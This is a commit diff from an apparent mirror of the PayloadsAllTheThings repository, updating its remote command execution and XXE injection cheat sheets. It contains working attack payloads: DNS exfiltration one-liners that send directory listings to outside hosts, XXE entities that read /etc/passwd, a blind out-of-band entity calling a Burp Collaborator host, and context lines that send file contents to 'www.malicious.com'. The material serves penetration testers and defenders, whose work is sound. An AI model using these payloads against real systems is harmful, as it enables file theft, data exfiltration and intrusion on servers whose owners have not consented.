ch0ic3/PayloadsAllTheThings
1
0
Fork 0
mirror of https://github.com/swisskyrepo/PayloadsAllTheThings.git synced 2024-12-18 18:36:10 +00:00
Code Issues Actions Packages Projects Releases Wiki Activity

XXE references + summary

Browse Source
This commit is contained in:
Swissky 2018-12-25 12:08:32 +01:00
parent c25af52316
commit cdc3b5e080
2 changed files with 48 additions and 8 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

7
Remote commands execution/README.md
View File

@ -1,6 +1,6 @@
# Remote Commands Execution
Remote Commands execution is a security vulnerability that allows an attacker to execute Commandss from a remote server.
Remote Commands execution is a security vulnerability that allows an attacker to execute commands from a remote server.
NOTE: Reverse Shell Command are relocated to a [single file](https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/Methodology%20and%20Resources/Reverse%20Shell%20Cheatsheet.md)
## Exploits
@ -156,6 +156,11 @@ for i in $(ls /) ; do host "http://$i.3a43c7e4e57a8d0e2057.d.zhack.ca"; done
$(host $(wget -h|head -n1|sed 's/[ ,]/-/g'|tr -d '.').sudo.co.il)
```
Online tools to check for DNS based data exfiltration:
- dnsbin.zhack.ca
- pingb.in
## References
* [SECURITY CAFÉ - Exploiting Timed Based RCE](https://securitycafe.ro/2017/02/28/time-based-data-exfiltration/)

49
XXE injection/README.md
View File

@ -1,11 +1,25 @@
# XML External Entity
An XML External Entity attack is a type of attack against an application that parses XML input and allows XML entities.
XML entities can be used to tell the XML parser to fetch specific content on the server.
> An XML External Entity attack is a type of attack against an application that parses XML input and allows XML entities. XML entities can be used to tell the XML parser to fetch specific content on the server.
**Internal Entity**: If an entity is declared within a DTD it is called as internal entity.
Syntax: `<!ENTITY entity_name "entity_value">`
**External Entity**: If an entity is declared outside a DTD it is called as external entity. Identified by `SYSTEM`.
Syntax: `<!ENTITY entity_name SYSTEM "entity_value">`
## Summary
- [Exploit](#exploit)
- [Basic XXE](#basic-xxe)
- [PHP Wrapper inside XXE](#php-wrapper-inside-xxe)
- [Deny of service](#deny-of-service)
- [Blind XXE - Out of Band](#blind-xxe---out-of-Band)
- [XXE in exotic files](#xxe-in-exotic-files)
## Exploit
Basic XML external entity test, the result should contain "John" in `firstName` and "Doe" in `lastName`.
Basic entity test, when the XML parser parses the external entities the result should contain "John" in `firstName` and "Doe" in `lastName`. Entities are defined inside the `DOCTYPE` element.
```xml
<!--?xml version="1.0" ?-->
@ -16,9 +30,15 @@ Basic XML external entity test, the result should contain "John" in `firstName`
</userInfo>
```
It might help to set the `Content-Type: application/xml` in the request when sending XML payload to the server.
## Basic XXE
Classic XXE
Classic XXE, we try to display the content of the file `/etc/passwd`
```xml
<?xml version="1.0"?><!DOCTYPE root [<!ENTITY test SYSTEM 'file:///etc/passwd'>]><root>&test;</root>
```
```xml
<?xml version="1.0"?>
@ -75,7 +95,7 @@ Classic XXE Base64 encoded
## Deny of service
**Warning** : These attacks will disable the service or the server, do not use them on the Prod.
**Warning** : These attacks might kill the service or the server, do not use them on the production.
Billion Laugh Attack
@ -110,6 +130,17 @@ Sometimes you won't have a result outputted in the page but you can still extrac
### Blind XXE
The easiest way to test for a blind XXE is to try to load a remote resource such as a Burp Collaborator.
```xml
<?xml version="1.0" ?>
<!DOCTYPE root [
<!ENTITY % ext SYSTEM "http://UNIQUE_ID_FOR_BURP_COLLABORATOR.burpcollaborator.net/x"> %ext;
]>
<r></r>
```
Send the content of `/etc/passwd` to "www.malicious.com", you may receive only the first line.
```xml
@ -153,6 +184,8 @@ File stored on http://127.0.0.1/dtd.xml
<!ENTITY % param1 "<!ENTITY exfil SYSTEM 'http://127.0.0.1/dtd.xml?%data;'>">
```
## XXE in exotic files
### XXE inside SOAP
```xml
@ -194,5 +227,7 @@ GIF (experimental)
* [Detecting and exploiting XXE in SAML Interfaces - Von Christian Mainka](http://web-in-security.blogspot.fr/2014/11/detecting-and-exploiting-xxe-in-saml.html)
* [staaldraad - XXE payloads](https://gist.github.com/staaldraad/01415b990939494879b4)
* [mgeeky - XML attacks](https://gist.github.com/mgeeky/4f726d3b374f0a34267d4f19c9004870)
* [Exploiting xxe in file upload functionality - BLACKHAT WEBCAST- 11/19/15 Will Vandevanter - @_will_is_](https://www.blackhat.com/docs/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.pdf)
* [XXE ALL THE THINGS!!! (including Apple iOS's Office Viewer)](http://en.hackdig.com/08/28075.htm)
* [Exploiting xxe in file upload functionality - BLACKHAT WEBCAST - 11/19/15 Will Vandevanter - @_will_is_](https://www.blackhat.com/docs/webcast/11192015-exploiting-xml-entity-vulnerabilities-in-file-parsing-functionality.pdf)
* [XXE ALL THE THINGS!!! (including Apple iOS's Office Viewer)](http://en.hackdig.com/08/28075.htm)
* [Understanding Xxe From Basic To Blind - 10/11/2018 - Utkarsh Agrawal](http://agrawalsmart7.com/2018/11/10/Understanding-XXE-from-Basic-to-Blind.html)
* [From blind XXE to root-level file read access - December 12, 2018 by Pieter Hiele](https://www.honoki.net/2018/12/from-blind-xxe-to-root-level-file-read-access/)